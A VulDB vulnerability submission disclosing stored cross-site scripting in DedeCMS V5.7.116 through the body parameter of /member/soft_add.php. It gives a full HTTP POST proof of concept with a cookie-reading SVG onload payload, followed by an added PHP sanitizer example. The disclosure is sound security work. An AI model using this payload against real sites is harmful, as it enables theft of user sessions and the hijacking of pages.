Submission #453003: DedeCMS V5.7.116 Cross Site Scripting

Info

Title: DedeCMS V5.7.116 Cross Site Scripting
Description:

Summary

A stored Cross-Site Scripting (XSS) vulnerability has been identified in the DedeCMS V5.7.116 content management system. The vulnerability exists due to insufficient filtering of the body parameter in the /member/soft_add.php script. This issue allows an attacker to inject malicious scripts into software information pages, potentially compromising the security of the website and its users.

Details

The vulnerability is present in the /member/soft_add.php script, which does not adequately sanitize the body parameter. An attacker with the ability to register as a member and publish software can exploit this flaw by injecting malicious scripts into the software content. These scripts are executed when other users view the compromised software page.

Proof of Concept (POC)

    POST /member/soft_add.php HTTP/1.1
    Host: target-ip
    Content-Length: 2657
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: [users'cookie]
    Connection: keep-alive

    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="dopost"

    save
    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="channelid"

    3
    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="title"

    test soft
    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="tags"

    test
    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="writer"

    test
    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="filetype"

    .exe
    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="language"

    简体中文
    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="softtype"

    国产软件
    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="accredit"

    共享软件
    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="os"

    Win2003,WinXP,Win2000,Win9X
    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="softrank"

    3
    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="officialDemo"


    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="officialUrl"

    http://
    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="softsize"


    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="unit"

    MB
    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="source"


    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="typeid"

    18
    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="needmoney"

    0
    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="litpic"; filename=""
    Content-Type: application/octet-stream


    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="dede_addonfields"


    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="dede_fieldshash"

    [users'fieldshash]
    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="body"

    <p>asd</p><svg/onload=alert(document.cookie)>
    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="softurl1"


    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="servermsg1"

    本地下载
    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr
    Content-Disposition: form-data; name="picnum"

    5
    ------WebKitFormBoundaryoNgLBRDOkaHmDGvr--
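One way to filter a rich-text field such as the body parameter on the server before it is stored, shown as an added example that is not DedeCMS code or the vendor's fix. The function name sanitize_body and both allowlists are hypothetical, and PHP 7+ with the DOM extension is assumed.

```php
<?php
// Added example: allowlist filter for a rich-text field. Not DedeCMS code;
// sanitize_body() and both allowlists are hypothetical. Needs PHP 7+ with ext-dom.
const ALLOWED_TAGS  = ['p', 'br', 'b', 'i', 'em', 'strong', 'ul', 'ol', 'li', 'a'];
const ALLOWED_ATTRS = ['a' => ['href']];

function sanitize_body(string $html): string
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true); // unknown tags such as <svg> raise parser warnings
    // Wrap the input in a known root; the XML prolog makes libxml read it as UTF-8.
    $doc->loadHTML('<?xml encoding="UTF-8"><div>' . $html . '</div>', LIBXML_NONET);
    libxml_clear_errors();
    // The wrapper is the first <div> in document order. Input that closes it early
    // ends up outside the wrapper and is therefore dropped from the output.
    $root = $doc->getElementsByTagName('div')->item(0);
    $xpath = new DOMXPath($doc);
    // Work on a snapshot so that removing nodes does not disturb the iteration.
    foreach (iterator_to_array($xpath->query('.//*', $root)) as $el) {
        $tag = strtolower($el->nodeName);
        if (!in_array($tag, ALLOWED_TAGS, true)) {
            // Drop the element and its whole subtree (script, svg, iframe, style, ...).
            if ($el->parentNode !== null) {
                $el->parentNode->removeChild($el);
            }
            continue;
        }
        foreach (iterator_to_array($el->attributes) as $attr) {
            $name = strtolower($attr->nodeName);
            $keep = in_array($name, ALLOWED_ATTRS[$tag] ?? [], true);
            // Links may only point at http(s); this rejects javascript: and data: URLs.
            if ($keep && $name === 'href' && !preg_match('#^https?://#i', trim($attr->nodeValue))) {
                $keep = false;
            }
            if (!$keep) {
                $el->removeAttributeNode($attr); // removes on* handlers, style, srcdoc, ...
            }
        }
    }
    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $doc->saveHTML($child); // text nodes are entity-encoded on output
    }
    return $out;
}

// Constructed sample: the body value from the request in this report.
echo sanitize_body('<p>asd</p><svg/onload=alert(document.cookie)>'), "\n";
```

Filtering on input covers new submissions only; content stored before the filter was deployed has to be passed through the same function when it is rendered or migrated.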
Source: https://github.com/Hebing123/cve/issues/78
User: jiashenghe (UID 39445)
Submission: 2024-11-27 10:34 AM (2 years ago)
Moderation: 2024-12-04 05:31 PM (7 days later)
Status: Accepted
VulDB Entry: 286904 [DedeCMS 5.7.116 /member/soft_add.php body cross site scripting]
Points: 20
